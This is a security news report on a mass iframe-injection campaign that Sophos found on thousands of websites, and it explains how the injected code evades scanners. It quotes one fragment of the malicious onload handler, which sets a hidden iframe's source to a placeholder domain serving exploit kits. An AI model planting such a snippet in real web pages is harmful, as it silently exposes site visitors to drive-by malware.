Security researchers warn that a new injection attack has infected thousands of websites with malicious IFrames. In order to avoid detection, the rogue IFrames get their src attribute through an onload JavaScript event.

The infection was first spotted by malware analysts from antivirus vendor Sophos on the website of music legend Van Morrison. "What I did see was a heavily obfuscated script injected into the page that references an iframe. A quick analysis of the obfuscated script revealed that it adds an iframe to the page to load content from a remote site," Paul O Baccas, virus and spam researcher at SophosLabs reported on October 22nd.

Since then Sophos has added detection for this threat under Mal/Iframe-N. Mr. Baccas announced yesterday that the number of infections with this malicious piece of code had risen to reach several thousands of websites, including some high profile ones.

Aside from the heavy obfuscation, which is a common technique of hiding rogue code on compromised pages, this attack makes use of a specific trick to avoid Web scanners. More specifically, decoding the string will result in an IFrame that doesn't have a direct src value. Instead it uses an onload="if (!this.src) {this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}" function to generate it.

The src usually points to an exploit kit hosted on third-party servers, which targets vulnerabilities in outdated software and attempts to infect visitors with malware. "All the domains used so far have been based in Russia," the Sophos researcher notes.

The method of injection has not been determined yet, but regardless of how it's done, the malicious IFrame is inserted at the end of the page after the </html> element. In a recent similar attack, compromised FTP credentials have been used to infect the websites, but automated tools exploiting cross-site scripting or SQL injection weaknesses are likely candidates too.

Web exploitation has been a common method of malware distribution, suggesting that the technique is successful enough for cybercriminals to invest their resources into these attacks. Studies have shown that this is largely because users fail to install critical patches for popular software such as Adobe Reader, Flash Player, Java Runtime Environment, Microsoft Office or Windows itself.